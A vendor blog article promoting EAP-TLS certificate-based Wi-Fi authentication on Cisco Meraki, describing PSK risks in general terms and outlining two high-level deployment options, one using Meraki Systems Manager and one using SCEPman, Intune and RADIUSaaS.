Articles

Meraki EAP-TLS

Written by Ziad Alloush | May 9, 2024 12:22:05 AM




M
ost users are working with a laptop from many different locations. This means that most of the time, they are connecting their devices via Wi-Fi to get their work done.

The most common way to connect to a Wi-Fi network is through a Pre-Shared Key (PSK). You may know this as the password on the back of your router or scribbled somewhere on a posted note or even written on the whiteboard at work for everyone to see. A passwords strength is not only tied to length/complexity, but also to how well it is hidden, or kept secret.

Bad actors can capture these PSKs quite easily through various means and one of them involves using a pineapple. Now I do not mean the fruit, I am talking about the incognito certified hacker tool that costs less than the weekly grocery shop. The Hak5 Pineapple is a tool, that looks like a home router, and is used by pen testers to audit wireless networks. In short, these devices can intercept the encrypted passwords that are being transmitted and decrypt them for use later. Once they have your PSK, the same device can be used to conduct man in the middle (MM) attacks, where your data passes through the bad actor’s machine before getting to its destination, giving the attackers access to your personal information. Of course, if your Wi-Fi password is written down somewhere, where everyone can see it, none of this is required and hackers can skip to the MitM attack.

The other option is the gold standard on how to implement secure corporate Wi-Fi authentication. It is the certificate-based Wi-Fi authentication method, Extensible Authentication Protocol-Transport Layer Security (EAP-TLS). EAP-TLS uses certificates on installed on user devices and servers to verify that the user attempting to connect to the wireless network, has the privileges to do so. These certs can be pushed to user machines through the device management tool of your choice, e.g. Intune. If configured correctly, this method will require no user involvement ensuring a seamless user journey.




7 Key Benefits of Implementing EAP-TLS In Your Corporate Wi-Fi Network

  1. AP-TLS is an alternative to password-based authentication that uses digital certificates bound to individual users or devices. These certificates identify a user on the network, and they cannot be forged, they need to be verified by an authentication server. This allows admins fine grained control over user access.
  2. EAP-TLS frees users from the stress of memorizing and storing complicated passwords thanks to certificates fundamentally attached to devices and the ability to authenticate automatically.
  3. IT departments can save time by dealing with common authentication problems like forgotten passwords and needing to change them often.
  4. Administrators control a certificate’s validity time, allowing them to manage re-verification cycles and guaranteeing safe network access.
  5. Password reuse is a major security concern in password-based systems since it increases the likelihood of unauthorized access and data breaches. EAP-TLS, on the other hand, uses digital certificates to prevent certificate duplication and reuse, making it impossible to utilize stolen credentials in any way. EAP-TLS provides an enhanced security framework to protect sensitive data and resources by reducing the risks associated with password theft and reuse, strengthening the network against sophisticated cyber assaults.
  6. EAP-TLS is one of the most reliable options when comparing authentication security protocols. When X.509 digital certificates are encrypted using state-of-the-art cryptographic methods like elliptic curve cryptography (ECC), the protocol provides the highest level of security possible.
  7. Due to its elaborate security mechanism, EAP-TLS is very resistant to eavesdropping, man-in-the-middle attacks, and other forms of network intrusion. Businesses may set up a very safe communication channel using digital certificates for robust encryption, protecting the privacy and security of any information sent over the network.




How Can We Achieve This In a Modern Managed Environment with Minimal Hardware Dependencies?

There are numerous ways to incorporate EAP-TLS into your corporate Wi-Fi network. However, at its core, EAP-TLS involves the following three members:

The Supplicant: This is the user's device.

The Authenticator: The purpose of the authenticator is to provide validation and communication between the supplicant and the authentication server.

The Authentication Server: This comes in the form of a AAA (Authentication, Authorisation, Accounting) server e.g., a RADIUS server. It determines whether to allow or deny network access based on the certificate they possess.






1. Meraki Certificate-based Wi-Fi authentication with Systems Manager

This is a pure Meraki solution achieved by using features available on the Meraki Dashboard; the web portal used to manage all of your Meraki devices, organisation wide. We eliminate the need for any external AAA server or onsite PKI infrastructure.

To achieve this sole product solution, you will need to ensure that your access control settings within Meraki Dashboard are set to use Meraki Cloud Authentication. This setting is what allows for the authentication and privilege checks that would be done via traditional EAP-TLS configuration. Once this has been completed, the only thing left is to create your users on Meraki Dashboard.

Once the Meraki Dashboard configurations have been finalised, we now need to enrol user devices i.e., the user machines/laptops. The process of enrolment is used to make sure that only enrolled devices have access to the network, and by doing so, only allowed users can access the network. There are two options provided by Meraki for device enrolment, these are:

  • Agent enrolment
  • Profile enrolment


Given Meraki Dashboard configurations and device enrolment have been completed correctly, your environment will be utilising EAP-TLS for verification/authentication on the wireless network.

 

 

2. Meraki Certificate-based Wi-Fi Authentication with SCEPman,
Intune and RADIUSaaS

As mentioned previously; to incorporate EAP-TLS into your network, you will need to deploy some kind of authenticator along with an authentication server. In this solution, we utilise the following: 

SCEPman

SCEPman is a cloud-based CA (Certificate Authority) running in Azure. SCEPman will be performing the role of the authenticator in this solution, it will ensure that communication between the supplicant device and the authentication server is valid and secure.
 
RADIUSaaS
 
RADIUSaaS is a cloud-based AAA server. This solution will be used to determine whether or not to allow or deny the supplicant device access to the network based on its certificate.
 
Intune
 
Although not a necessary component for the function of EAP-TLS, Intune is used to manage user end point devices and can issue and revoke certificates remotely by administrators. This is a valuable tool to have in large organisations that carry many end devices.


 

Now let us look at the configuration steps. The first thing we need to do is to get SCEPman running in our Azure environment, follow all the required configurational steps and download our CA certificate. Once we have this cert we will need to distribute it to all endpoint devices, this is done easily through Intune or whatever MDM (Mobile Device Manager) you are using in your organisation.

Once SCEPman configuration has been completed, we can move onto configuring our cloud-based RADIUS server (RADIUSaaS), here you will add the CA cert we created earlier. You may also be required to make all relevant network configurations to ensure client devices can reach the RADIUS server.

Now that we have configured the authenticator and the authentication server, we need to ensure that all the relevant certs are installed on the end devices. Once again, we will utilise Intune for this task.

Once all required configurations have been made, you should see EAP-TLS traffic as shown in the image below:


We are a Meraki and SCEPman partner.
Reach out to us for more details and help to get these deployed.